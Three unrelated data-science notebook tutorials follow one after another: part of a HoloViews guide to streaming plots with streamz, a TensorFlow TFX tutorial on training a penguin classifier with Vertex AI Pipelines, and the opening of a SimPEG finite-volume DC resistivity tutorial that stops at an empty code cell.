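The ``sliding_window`` semantics are easy to emulate without streamz: nothing is emitted until ``n`` items have arrived, after which every new item yields the most recent ``n`` (a generic sketch, not streamz's implementation):

```python
from collections import deque

def sliding_window(n):
    """Return a feeder: feed(item) -> tuple of the last n items, or None while warming up."""
    window = deque(maxlen=n)
    def feed(item):
        window.append(item)
        return tuple(window) if len(window) == n else None
    return feed

feed = sliding_window(3)
emitted = [out for out in map(feed, range(5)) if out is not None]
# emitted == [(0, 1, 2), (1, 2, 3), (2, 3, 4)]
```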
```
point_source = streamz.Stream()
pipe = Pipe(data=[])
point_source.sliding_window(20).map(pd.concat).sink(pipe.send) # Connect streamz to the Pipe
scatter_dmap = hv.DynamicMap(hv.Scatter, streams=[pipe])
```
Having set up our streaming pipeline, we can again display it:
```
%%opts Scatter [color_index='count', bgcolor='black']
scatter_dmap.redim.range(y=(-4, 4))
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz1.gif"></img>
There is now a pipeline, but initially this plot will be empty, because no data has been sent to it. To see the plot update, let's use the ``emit`` method of ``streamz.Stream`` to send small chunks of random pandas ``DataFrame``s to our plot:
```
for i in range(100):
df = pd.DataFrame({'x': np.random.rand(100), 'y': np.random.randn(100), 'count': i},
columns=['x', 'y', 'count'])
point_source.emit(df)
```
#### Using StreamingDataFrame and StreamingSeries
The streamz library provides ``StreamingDataFrame`` and ``StreamingSeries`` as a powerful way to easily work with live sources of tabular data. This makes it perfectly suited to work with ``Buffer``. With the ``StreamingDataFrame`` we can easily stream data, apply computations such as cumulative and rolling statistics and then visualize the data with HoloViews.
The ``streamz.dataframe`` module provides a ``Random`` utility that generates a ``StreamingDataFrame`` that emits random data with a certain frequency at a specified interval. The ``example`` attribute lets us see the structure and dtypes of the data we can expect:
```
simple_sdf = streamz.dataframe.Random(freq='10ms', interval='100ms')
print(simple_sdf.index)
simple_sdf.example.dtypes
```
Since the ``StreamingDataFrame`` provides a pandas-like API, we can specify operations on the data directly. In this example we subtract a fixed offset and then compute the cumulative sum, giving us a randomly drifting timeseries. We can then pass the x-values of this dataframe to the HoloViews ``Buffer`` and supply ``hv.Curve`` as the ``DynamicMap`` callback to stream the data into a HoloViews ``Curve`` (with the default key and value dimensions):
```
%%opts Curve [width=500 show_grid=True]
sdf = (simple_sdf-0.5).cumsum()
hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x)])
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz3.gif"></img>
The ``Random`` StreamingDataFrame will asynchronously emit events, driving the visualization forward, until it is explicitly stopped, which we can do by calling the ``stop`` method.
```
simple_sdf.stop()
```
#### Making use of the ``StreamingDataFrame`` API
So far we have only computed the cumulative sum, but the ``StreamingDataFrame`` actually has an extensive API that lets us run a broad range of streaming computations on our data. For example, let's apply a rolling mean to our x-values with a window of 500ms and overlay it on top of the 'raw' data:
```
%%opts Curve [width=500 show_grid=True]
source_df = streamz.dataframe.Random(freq='5ms', interval='100ms')
sdf = (source_df-0.5).cumsum()
raw_dmap = hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x)])
smooth_dmap = hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x.rolling('500ms').mean())])
raw_dmap.relabel('raw') * smooth_dmap.relabel('smooth')
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz4.gif"></img>
```
source_df.stop()
```
#### Customizing elements with ``functools.partial``
In this notebook we have avoided defining custom functions for ``DynamicMap`` by simply supplying the element class and using the element constructor instead. Although this works well for examples, it often won't generalize to real-life situations, because you don't have an opportunity to use anything other than the default dimensions. One simple way to get around this limitation is to use ``functools.partial``:
```
from functools import partial
```
You can now easily create an inline callable that creates an element with custom key and value dimensions by supplying them to ``partial`` in the form ``partial(hv.Element, kdims=[...], vdims=[...])``. In the next section, we will see an example of this pattern using ``hv.BoxWhisker``.
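As a minimal sketch of what ``partial`` does here, shown with a plain, hypothetical callable rather than a HoloViews element so the snippet runs on its own:

```python
from functools import partial

# make_element is a hypothetical stand-in for an element constructor such as
# hv.Scatter(data, kdims=..., vdims=...); it just records its arguments.
def make_element(data, kdims=None, vdims=None):
    return {'data': data, 'kdims': kdims, 'vdims': vdims}

# Bind custom key/value dimensions once; the result is an inline one-argument
# callable, which is the shape a DynamicMap callback expects.
scatter_factory = partial(make_element, kdims=['time'], vdims=['value'])

element = scatter_factory([(0, 1.0), (1, 0.5)])
```

The same shape, ``partial(hv.Element, kdims=[...], vdims=[...])``, is what gets passed to a ``DynamicMap``.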
#### Controlling the length
By default the ``Buffer`` accumulates a ``length`` of 1000 samples. In many cases this may be excessive, but we can specify a shorter (or longer) length value to control how much history we accumulate, often depending on the element type.
In the following example, a custom ``length`` is used together with a ``partial`` wrapping ``hv.BoxWhisker`` in order to display a cumulative sum generated from a stream of random dataframes:
```
multi_source = streamz.dataframe.Random(freq='5ms', interval='100ms')
sdf = (multi_source-0.5).cumsum()
hv.DynamicMap(hv.Table, streams=[Buffer(sdf.x, length=10)]) +\
hv.DynamicMap(partial(hv.BoxWhisker, kdims=[], vdims='x'), streams=[Buffer(sdf.x, length=100)])
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz5.gif"></img>
Here the given stream ``sdf`` is being consumed by a table showing a short length (where only the items visible in the table need to be kept), along with a plot computing averages and variances over a longer length (100 items).
#### Updating multiple cells
Since a ``StreamingDataFrame`` will emit data until it is stopped, we can subscribe multiple plots across different cells to the same stream. Here, let's add a ``Scatter`` plot of the same data stream as in the preceding cell:
```
hv.DynamicMap(hv.Scatter, streams=[Buffer(sdf.x)]).redim.label(x='value', index='time')
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz6.gif"></img>
Here we let the ``Scatter`` elements use the column names from the supplied ``DataFrames`` which are relabelled using the ``redim`` method. Stopping the stream will now stop updates to all three of these DynamicMaps:
```
multi_source.stop()
```
## Operations over streaming data
As we discovered above, the ``Buffer`` lets us set a ``length``, which defines how many rows we want to accumulate. We can use this to our advantage and apply an operation over this length window. In this example we declare a ``Dataset`` and then apply the ``histogram`` operation to compute a ``Histogram`` over the specified ``length`` window:
```
hist_source = streamz.dataframe.Random(freq='5ms', interval='100ms')
sdf = (hist_source-0.5).cumsum()
dmap = hv.DynamicMap(hv.Dataset, streams=[Buffer(sdf.x, length=500)])
hv.operation.histogram(dmap, dimension='x')
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz7.gif"></img>
```
hist_source.stop()
```
#### Datashading
The same approach also works for the datashade operation, letting us datashade the entire ``length`` window even if it is very large, such as 1 million samples:
```
%%opts RGB [width=600]
from holoviews.operation.datashader import datashade
from bokeh.palettes import Blues8
large_source = streamz.dataframe.Random(freq='100us', interval='200ms')
sdf = (large_source-0.5).cumsum()
dmap = hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x, length=1000000)])
datashade(dmap, streams=[hv.streams.PlotSize], normalization='linear', cmap=Blues8)
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz8.gif"></img>
```
large_source.stop()
```
## Asynchronous updates using the tornado ``IOLoop``
In most cases, instead of pushing updates manually from the same Python process, you'll want the object to update asynchronously as new data arrives. Since both Jupyter and Bokeh server run on [tornado](http://www.tornadoweb.org/en/stable/), we can use the tornado ``IOLoop`` in both cases to define a non-blocking co-routine that can push data to our stream whenever it is ready. The ``PeriodicCallback`` makes this approach very simple: we define a function that will be called periodically, with a timeout defined in milliseconds. Once we have declared the callback, we can call ``start`` to begin emitting events:
```
%%opts Curve [width=600]
from tornado.ioloop import PeriodicCallback
from tornado import gen
count = 0
buffer = Buffer(np.zeros((0, 2)), length=50)
@gen.coroutine
def f():
global count
count += 1
buffer.send(np.array([[count, np.random.rand()]]))
cb = PeriodicCallback(f, 100)
cb.start()
hv.DynamicMap(hv.Curve, streams=[buffer]).redim.range(y=(0, 1))
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz2.gif"></img>
Since the callback is non-blocking we can continue working in the notebook and execute other cells. Once we're done we can stop the callback by calling ``cb.stop()``.
```
cb.stop()
```
## Real examples
Using the ``Pipe`` and ``Buffer`` streams we can create complex streaming plots very easily. In addition to the toy examples we presented in this guide, it is worth looking at some of the examples using real, live, streaming data.
* The [streaming_psutil](http://holoviews.org/gallery/apps/bokeh/stream_psutil.html) bokeh app is one such example, which displays CPU and memory information using the ``psutil`` library (install with ``pip install psutil`` or ``conda install psutil``).
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz9.gif"></img>
As you can see, streaming data works like streams in HoloViews in general, flexibly handling changes over time, whether under explicit control or driven by some external data source.
##### Copyright 2021 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Vertex AI Training with TFX and Vertex Pipelines
<div class="devsite-table-wrapper"><table class="tfo-notebook-buttons" align="left">
<td><a target="_blank" href="https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_vertex_training">
<img src="https://www.tensorflow.org/images/tf_logo_32px.png"/>View on TensorFlow.org</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/tfx/blob/master/docs/tutorials/tfx/gcp/vertex_pipelines_vertex_training.ipynb">
<img src="https://www.tensorflow.org/images/colab_logo_32px.png">Run in Google Colab</a></td>
<td><a target="_blank" href="https://github.com/tensorflow/tfx/tree/master/docs/tutorials/tfx/gcp/vertex_pipelines_vertex_training.ipynb">
<img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png">View source on GitHub</a></td>
<td><a href="https://storage.googleapis.com/tensorflow_docs/tfx/docs/tutorials/tfx/gcp/vertex_pipelines_vertex_training.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a></td>
<td><a href="https://console.cloud.google.com/mlengine/notebooks/deploy-notebook?q=download_url%3Dhttps%253A%252F%252Fraw.githubusercontent.com%252Ftensorflow%252Ftfx%252Fmaster%252Fdocs%252Ftutorials%252Ftfx%252Fgcp%252Fvertex_pipelines_vertex_training.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Run in Google Cloud AI Platform Notebook</a></td>
</table></div>
This notebook-based tutorial will create and run a TFX pipeline which trains an
ML model using Vertex AI Training service.
This notebook is based on the TFX pipeline we built in
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple).
If you have not read that tutorial yet, you should read it before proceeding
with this notebook.
You can train models on Vertex AI using AutoML, or use custom training. In
custom training, you can select many different machine types to power your
training jobs, enable distributed training, use hyperparameter tuning, and
accelerate with GPUs.
In this tutorial, we will use Vertex AI Training with custom jobs to train
a model in a TFX pipeline.
This notebook is intended to be run on
[Google Colab](https://colab.research.google.com/notebooks/intro.ipynb) or on
[AI Platform Notebooks](https://cloud.google.com/ai-platform-notebooks). If you
are not using one of these, you can simply click the "Run in Google Colab" button
above.
## Set up
If you have completed
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple),
you will have a working GCP project and a GCS bucket, which is all we need
for this tutorial. Please read the preliminary tutorial first if you missed it.
### Install python packages
We will install required Python packages including TFX and KFP to author ML
pipelines and submit jobs to Vertex Pipelines.
```
# Use the latest version of pip.
!pip install --upgrade pip
!pip install --upgrade "tfx[kfp]<2"
```
#### Did you restart the runtime?
If you are using Google Colab, the first time you run
the cell above you must restart the runtime by clicking
the "RESTART RUNTIME" button above or using the "Runtime > Restart
runtime ..." menu. This is because of the way that Colab
loads packages.
If you are not on Colab, you can restart the runtime with the following cell.
```
# docs_infra: no_execute
import sys
if not 'google.colab' in sys.modules:
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
```
### Login in to Google for this notebook
If you are running this notebook on Colab, authenticate with your user account:
```
import sys
if 'google.colab' in sys.modules:
from google.colab import auth
auth.authenticate_user()
```
**If you are on AI Platform Notebooks**, authenticate with Google Cloud before
running the next section, by running
```sh
gcloud auth login
```
**in the Terminal window** (which you can open via **File** > **New** in the
menu). You only need to do this once per notebook instance.
Check the package versions.
```
import tensorflow as tf
print('TensorFlow version: {}'.format(tf.__version__))
from tfx import v1 as tfx
print('TFX version: {}'.format(tfx.__version__))
import kfp
print('KFP version: {}'.format(kfp.__version__))
```
### Set up variables
We will set up some variables used to customize the pipelines below. The following
information is required:
* GCP Project id. See
[Identifying your project id](https://cloud.google.com/resource-manager/docs/creating-managing-projects#identifying_projects).
* GCP Region to run pipelines. For more information about the regions that
Vertex Pipelines is available in, see the
[Vertex AI locations guide](https://cloud.google.com/vertex-ai/docs/general/locations#feature-availability).
* Google Cloud Storage Bucket to store pipeline outputs.
**Enter required values in the cell below before running it**.
```
GOOGLE_CLOUD_PROJECT = '' # <--- ENTER THIS
GOOGLE_CLOUD_REGION = '' # <--- ENTER THIS
GCS_BUCKET_NAME = '' # <--- ENTER THIS
if not (GOOGLE_CLOUD_PROJECT and GOOGLE_CLOUD_REGION and GCS_BUCKET_NAME):
from absl import logging
logging.error('Please set all required parameters.')
```
Set `gcloud` to use your project.
```
!gcloud config set project {GOOGLE_CLOUD_PROJECT}
PIPELINE_NAME = 'penguin-vertex-training'
# Path to various pipeline artifact.
PIPELINE_ROOT = 'gs://{}/pipeline_root/{}'.format(GCS_BUCKET_NAME, PIPELINE_NAME)
# Paths for users' Python module.
MODULE_ROOT = 'gs://{}/pipeline_module/{}'.format(GCS_BUCKET_NAME, PIPELINE_NAME)
# Paths for users' data.
DATA_ROOT = 'gs://{}/data/{}'.format(GCS_BUCKET_NAME, PIPELINE_NAME)
# This is the path where your model will be pushed for serving.
SERVING_MODEL_DIR = 'gs://{}/serving_model/{}'.format(
GCS_BUCKET_NAME, PIPELINE_NAME)
print('PIPELINE_ROOT: {}'.format(PIPELINE_ROOT))
```
### Prepare example data
We will use the same
[Palmer Penguins dataset](https://allisonhorst.github.io/palmerpenguins/articles/intro.html)
as
[Simple TFX Pipeline Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple).
There are four numeric features in this dataset, which were already normalized
to the range [0,1]. We will build a classification model which predicts the
`species` of penguins.
We need to make our own copy of the dataset. Because TFX ExampleGen reads
inputs from a directory, we need to create a directory and copy the dataset to it
on GCS.
```
!gsutil cp gs://download.tensorflow.org/data/palmer_penguins/penguins_processed.csv {DATA_ROOT}/
```
Take a quick look at the CSV file.
```
!gsutil cat {DATA_ROOT}/penguins_processed.csv | head
```
## Create a pipeline
Our pipeline will be very similar to the pipeline we created in
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple).
The pipeline will consist of three components: CsvExampleGen, Trainer and
Pusher. But we will use a special Trainer component which moves
training workloads to Vertex AI.
TFX provides a special `Trainer` to submit training jobs to Vertex AI Training
service. All we have to do is use `Trainer` in the extension module
instead of the standard `Trainer` component along with some required GCP
parameters.
In this tutorial, we will run Vertex AI Training jobs only using CPUs first
and then with a GPU.
### Write model code.
The model itself is almost identical to the model in
[Simple TFX Pipeline Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple).
We will add a `_get_distribution_strategy()` function, which creates a
[TensorFlow distribution strategy](https://www.tensorflow.org/guide/distributed_training);
`run_fn` uses it to apply MirroredStrategy when a GPU is available.
```
_trainer_module_file = 'penguin_trainer.py'
%%writefile {_trainer_module_file}
# Copied from https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple and
# slightly modified run_fn() to add distribution_strategy.
from typing import List
from absl import logging
import tensorflow as tf
from tensorflow import keras
from tensorflow_metadata.proto.v0 import schema_pb2
from tensorflow_transform.tf_metadata import schema_utils
from tfx import v1 as tfx
from tfx_bsl.public import tfxio
_FEATURE_KEYS = [
'culmen_length_mm', 'culmen_depth_mm', 'flipper_length_mm', 'body_mass_g'
]
_LABEL_KEY = 'species'
_TRAIN_BATCH_SIZE = 20
_EVAL_BATCH_SIZE = 10
# Since we're not generating or creating a schema, we will instead create
# a feature spec. Since there are a fairly small number of features this is
# manageable for this dataset.
_FEATURE_SPEC = {
**{
feature: tf.io.FixedLenFeature(shape=[1], dtype=tf.float32)
for feature in _FEATURE_KEYS
}, _LABEL_KEY: tf.io.FixedLenFeature(shape=[1], dtype=tf.int64)
}
def _input_fn(file_pattern: List[str],
data_accessor: tfx.components.DataAccessor,
schema: schema_pb2.Schema,
batch_size: int) -> tf.data.Dataset:
"""Generates features and label for training.
Args:
file_pattern: List of paths or patterns of input tfrecord files.
data_accessor: DataAccessor for converting input to RecordBatch.
schema: schema of the input data.
batch_size: representing the number of consecutive elements of returned
dataset to combine in a single batch
Returns:
A dataset that contains (features, indices) tuple where features is a
dictionary of Tensors, and indices is a single Tensor of label indices.
"""
return data_accessor.tf_dataset_factory(
file_pattern,
tfxio.TensorFlowDatasetOptions(
batch_size=batch_size, label_key=_LABEL_KEY),
schema=schema).repeat()
def _make_keras_model() -> tf.keras.Model:
"""Creates a DNN Keras model for classifying penguin data.
Returns:
A Keras Model.
"""
# The model below is built with Functional API, please refer to
# https://www.tensorflow.org/guide/keras/overview for all API options.
inputs = [keras.layers.Input(shape=(1,), name=f) for f in _FEATURE_KEYS]
d = keras.layers.concatenate(inputs)
for _ in range(2):
d = keras.layers.Dense(8, activation='relu')(d)
outputs = keras.layers.Dense(3)(d)
model = keras.Model(inputs=inputs, outputs=outputs)
model.compile(
optimizer=keras.optimizers.Adam(1e-2),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[keras.metrics.SparseCategoricalAccuracy()])
model.summary(print_fn=logging.info)
return model
# NEW: Read `use_gpu` from the custom_config of the Trainer.
# if it uses GPU, enable MirroredStrategy.
def _get_distribution_strategy(fn_args: tfx.components.FnArgs):
if fn_args.custom_config.get('use_gpu', False):
logging.info('Using MirroredStrategy with one GPU.')
return tf.distribute.MirroredStrategy(devices=['device:GPU:0'])
return None
# TFX Trainer will call this function.
def run_fn(fn_args: tfx.components.FnArgs):
"""Train the model based on given args.
Args:
fn_args: Holds args used to train the model as name/value pairs.
"""
# This schema is usually either an output of SchemaGen or a manually-curated
# version provided by the pipeline author. A schema can also be derived from the TFT
# graph if a Transform component is used. In the case when either is missing,
# `schema_from_feature_spec` could be used to generate schema from very simple
# feature_spec, but the schema returned would be very primitive.
schema = schema_utils.schema_from_feature_spec(_FEATURE_SPEC)
train_dataset = _input_fn(
fn_args.train_files,
fn_args.data_accessor,
schema,
batch_size=_TRAIN_BATCH_SIZE)
eval_dataset = _input_fn(
fn_args.eval_files,
fn_args.data_accessor,
schema,
batch_size=_EVAL_BATCH_SIZE)
# NEW: If we have a distribution strategy, build a model in a strategy scope.
strategy = _get_distribution_strategy(fn_args)
if strategy is None:
model = _make_keras_model()
else:
with strategy.scope():
model = _make_keras_model()
model.fit(
train_dataset,
steps_per_epoch=fn_args.train_steps,
validation_data=eval_dataset,
validation_steps=fn_args.eval_steps)
# The result of the training should be saved in `fn_args.serving_model_dir`
# directory.
model.save(fn_args.serving_model_dir, save_format='tf')
```
Copy the module file to GCS, from where it can be accessed by the pipeline components.
Otherwise, you might want to build a container image including the module file
and use that image to run the pipeline and AI Platform Training jobs.
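For the container-image route, a minimal sketch might look like the following (the base-image tag and copy path here are assumptions; the tag should match the TFX version in use):

```dockerfile
# Hypothetical sketch: extend the public TFX image and bake the module file in,
# so the pipeline and training jobs do not need to fetch it from GCS.
FROM gcr.io/tfx-oss-public/tfx:1.4.0
COPY penguin_trainer.py /pipeline/penguin_trainer.py
```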
```
!gsutil cp {_trainer_module_file} {MODULE_ROOT}/
```
### Write a pipeline definition
We will define a function to create a TFX pipeline. It has the same three
Components as in
[Simple TFX Pipeline Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple),
but we use a `Trainer` component in the GCP extension module.
`tfx.extensions.google_cloud_ai_platform.Trainer` behaves like a regular
`Trainer`, but it just moves the computation for the model training to the cloud.
It launches a custom job in the Vertex AI Training service, and the trainer
component in the orchestration system will simply wait until the Vertex AI
Training job completes.
```
def _create_pipeline(pipeline_name: str, pipeline_root: str, data_root: str,
module_file: str, serving_model_dir: str, project_id: str,
region: str, use_gpu: bool) -> tfx.dsl.Pipeline:
"""Implements the penguin pipeline with TFX."""
# Brings data into the pipeline or otherwise joins/converts training data.
example_gen = tfx.components.CsvExampleGen(input_base=data_root)
# NEW: Configuration for Vertex AI Training.
# This dictionary will be passed as `CustomJobSpec`.
vertex_job_spec = {
'project': project_id,
'worker_pool_specs': [{
'machine_spec': {
'machine_type': 'n1-standard-4',
},
'replica_count': 1,
'container_spec': {
'image_uri': 'gcr.io/tfx-oss-public/tfx:{}'.format(tfx.__version__),
},
}],
}
if use_gpu:
# See https://cloud.google.com/vertex-ai/docs/reference/rest/v1/MachineSpec#acceleratortype
# for available machine types.
vertex_job_spec['worker_pool_specs'][0]['machine_spec'].update({
'accelerator_type': 'NVIDIA_TESLA_K80',
'accelerator_count': 1
})
# Trains a model using Vertex AI Training.
# NEW: We need to specify a Trainer for GCP with related configs.
trainer = tfx.extensions.google_cloud_ai_platform.Trainer(
module_file=module_file,
examples=example_gen.outputs['examples'],
train_args=tfx.proto.TrainArgs(num_steps=100),
eval_args=tfx.proto.EvalArgs(num_steps=5),
custom_config={
tfx.extensions.google_cloud_ai_platform.ENABLE_UCAIP_KEY:
True,
tfx.extensions.google_cloud_ai_platform.UCAIP_REGION_KEY:
region,
tfx.extensions.google_cloud_ai_platform.TRAINING_ARGS_KEY:
vertex_job_spec,
'use_gpu':
use_gpu,
})
# Pushes the model to a filesystem destination.
pusher = tfx.components.Pusher(
model=trainer.outputs['model'],
push_destination=tfx.proto.PushDestination(
filesystem=tfx.proto.PushDestination.Filesystem(
base_directory=serving_model_dir)))
components = [
example_gen,
trainer,
pusher,
]
return tfx.dsl.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=components)
```
## Run the pipeline on Vertex Pipelines.
We will use Vertex Pipelines to run the pipeline as we did in
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple).
```
import os
PIPELINE_DEFINITION_FILE = PIPELINE_NAME + '_pipeline.json'
runner = tfx.orchestration.experimental.KubeflowV2DagRunner(
config=tfx.orchestration.experimental.KubeflowV2DagRunnerConfig(),
output_filename=PIPELINE_DEFINITION_FILE)
_ = runner.run(
_create_pipeline(
pipeline_name=PIPELINE_NAME,
pipeline_root=PIPELINE_ROOT,
data_root=DATA_ROOT,
module_file=os.path.join(MODULE_ROOT, _trainer_module_file),
serving_model_dir=SERVING_MODEL_DIR,
project_id=GOOGLE_CLOUD_PROJECT,
region=GOOGLE_CLOUD_REGION,
# We will use CPUs only for now.
use_gpu=False))
```
The generated definition file can be submitted using the kfp client.
```
# docs_infra: no_execute
from kfp.v2.google import client
pipelines_client = client.AIPlatformClient(
project_id=GOOGLE_CLOUD_PROJECT,
region=GOOGLE_CLOUD_REGION,
)
_ = pipelines_client.create_run_from_job_spec(PIPELINE_DEFINITION_FILE)
```
Now you can visit the link in the output above or visit
'Vertex AI > Pipelines' in
[Google Cloud Console](https://console.cloud.google.com/) to see the
progress.
### Run the pipeline using a GPU
Vertex AI supports training using various machine types including support for
GPUs. See
[Machine spec reference](https://cloud.google.com/vertex-ai/docs/reference/rest/v1/MachineSpec#acceleratortype)
for available options.
We already defined our pipeline to support GPU training. All we need to do is
set the `use_gpu` flag to True. The pipeline will then be created with a machine
spec including one NVIDIA_TESLA_K80, and our model training code will use
`tf.distribute.MirroredStrategy`.
Note that the `use_gpu` flag is not part of the Vertex or TFX API. It is only
used to control the training code in this tutorial.
```
# docs_infra: no_execute
runner.run(
_create_pipeline(
pipeline_name=PIPELINE_NAME,
pipeline_root=PIPELINE_ROOT,
data_root=DATA_ROOT,
module_file=os.path.join(MODULE_ROOT, _trainer_module_file),
serving_model_dir=SERVING_MODEL_DIR,
project_id=GOOGLE_CLOUD_PROJECT,
region=GOOGLE_CLOUD_REGION,
# Updated: Use GPUs. We will use a NVIDIA_TESLA_K80 and
# the model code will use tf.distribute.MirroredStrategy.
use_gpu=True))
_ = pipelines_client.create_run_from_job_spec(PIPELINE_DEFINITION_FILE)
```
Now you can visit the link in the output above or visit
'Vertex AI > Pipelines' in
[Google Cloud Console](https://console.cloud.google.com/) to see the
progress.
# Pixels and their neighbours: Finite volume
*Rowan Cockett, Lindsey Heagy and Doug Oldenburg*
This notebook uses [Python 2.7](https://docs.python.org/2/) and the open source package [SimPEG](http://simpeg.xyz). [SimPEG](http://simpeg.xyz) can be installed from PyPI, the Python package index, by running:
```
pip install SimPEG
```
Alternatively, these notebooks can be run on the web using Binder:
[](http://mybinder.org:/repo/simpeg/tle-finitevolume)
This tutorial consists of 3 parts: here we introduce the problem; in [divergence.ipynb](divergence.ipynb) we build the discrete divergence operator; and in [weakformulation.ipynb](weakformulation.ipynb) we discretize and solve the DC equations using the weak formulation.
**Contents**
- [DC Resistivity setup](#DC-Resistivity)
- [mesh](mesh.ipynb)
- [divergence](divergence.ipynb)
- [weak formulation](weakformulation.ipynb)
- [all together now](all_together_now.ipynb)
# DC Resistivity
<img src="./images/DCSurvey.png" width=60% align="center">
<h4 align="center"> Figure 1. Setup of a DC resistivity survey.</h4>
DC resistivity surveys obtain information about subsurface electrical conductivity, $\sigma$. This physical property is often diagnostic in mineral exploration, geotechnical, environmental and hydrogeologic problems, where the target of interest has a significant electrical conductivity contrast from the background. In a DC resistivity survey, steady state currents are set up in the subsurface by injecting current through a positive electrode and completing the circuit with a return electrode.
## Deriving the DC equations
<img src="images/DCEquations.png" width=70% align="center">
<h4 align="center">Figure 2. Derivation of the DC resistivity equations</h4>
Conservation of charge (which can be derived by taking the divergence of Ampere’s law at steady state) connects the divergence of the current density everywhere in space to the source term which consists of two point sources, one positive and one negative. The flow of current sets up electric fields according to Ohm’s law, which relates current density to electric fields through the electrical conductivity. From Faraday’s law for steady state fields, we can describe the electric field in terms of a scalar potential, $\phi$, which we sample at potential electrodes to obtain data in the form of potential differences.
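Written out, the chain of relations just described is (with $\vec{j}$ the current density, $I$ the injected current, and $\vec{r}_{s^+}$, $\vec{r}_{s^-}$ the locations of the positive and negative electrodes):
$$
\nabla \cdot \vec{j} = I\big(\delta(\vec{r}-\vec{r}_{s^+}) - \delta(\vec{r}-\vec{r}_{s^-})\big), \qquad \vec{j} = \sigma \vec{E}, \qquad \vec{E} = -\nabla \phi,
$$
which combine into a single second-order equation for the potential: $\nabla \cdot (\sigma \nabla \phi) = -I\big(\delta(\vec{r}-\vec{r}_{s^+}) - \delta(\vec{r}-\vec{r}_{s^-})\big)$.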
## The finish line
*Where are we going??*
Here, we are going to run through how to set up and solve the DC resistivity equations for a 2D problem using [SimPEG](http://simpeg.xyz). This is meant to give you a once-over of the whole picture. We will break down the steps to get here in the series of notebooks that follow...
```
# Import numpy, python's n-dimensional array package,
# the mesh class with differential operators from SimPEG
# matplotlib, the basic python plotting package
import numpy as np
from SimPEG import Mesh, Utils
import matplotlib.pyplot as plt
%matplotlib inline
plt.set_cmap(plt.get_cmap('viridis')) # use a nice colormap!
```
### Mesh
Where we solve things! See [mesh.ipynb](mesh.ipynb) for a discussion of how we construct a mesh and the associated properties we need.
```
# Define a unit-cell mesh
mesh = Mesh.TensorMesh([100, 80]) # setup a mesh on which to solve
print("The mesh has {nC} cells.".format(nC=mesh.nC))
mesh.plotGrid()
plt.axis('tight');
```
### Physical Property Model
Define an electrical conductivity ($\sigma$) model, on the cell-centers of the mesh.
```
# model parameters
sigma_background = 1. # Conductivity of the background, S/m
sigma_block = 10. # Conductivity of the block, S/m
# add a block to our model
x_block = np.r_[0.4, 0.6]
y_block = np.r_[0.4, 0.6]
# assign them on the mesh
sigma = sigma_background * np.ones(mesh.nC) # create a physical property model
block_indices = ((mesh.gridCC[:,0] >= x_block[0]) & # left boundary
(mesh.gridCC[:,0] <= x_block[1]) & # right boundary
(mesh.gridCC[:,1] >= y_block[0]) & # bottom boundary
(mesh.gridCC[:,1] <= y_block[1])) # top boundary
# add the block to the physical property model
sigma[block_indices] = sigma_block
# plot it!
plt.colorbar(mesh.plotImage(sigma)[0])
plt.title('electrical conductivity, $\sigma$')
```
### Define a source
Define location of the positive and negative electrodes
```
# Define a source
a_loc, b_loc = np.r_[0.2, 0.5], np.r_[0.8, 0.5]
source_locs = [a_loc, b_loc]
# locate it on the mesh
source_loc_inds = Utils.closestPoints(mesh, source_locs)
a_loc_mesh = mesh.gridCC[source_loc_inds[0],:]
b_loc_mesh = mesh.gridCC[source_loc_inds[1],:]
# plot it
plt.colorbar(mesh.plotImage(sigma)[0])
plt.plot(a_loc_mesh[0], a_loc_mesh[1],'wv', markersize=8) # a-electrode
plt.plot(b_loc_mesh[0], b_loc_mesh[1],'w^', markersize=8) # b-electrode
plt.title(r'electrical conductivity, $\sigma$')
```
### Assemble and solve the DC system of equations
How we construct the divergence operator is discussed in [divergence.ipynb](divergence.ipynb), and the inner product matrix in [weakformulation.ipynb](weakformulation.ipynb). The final system is assembled and discussed in [play.ipynb](play.ipynb) (with widgets!).
```
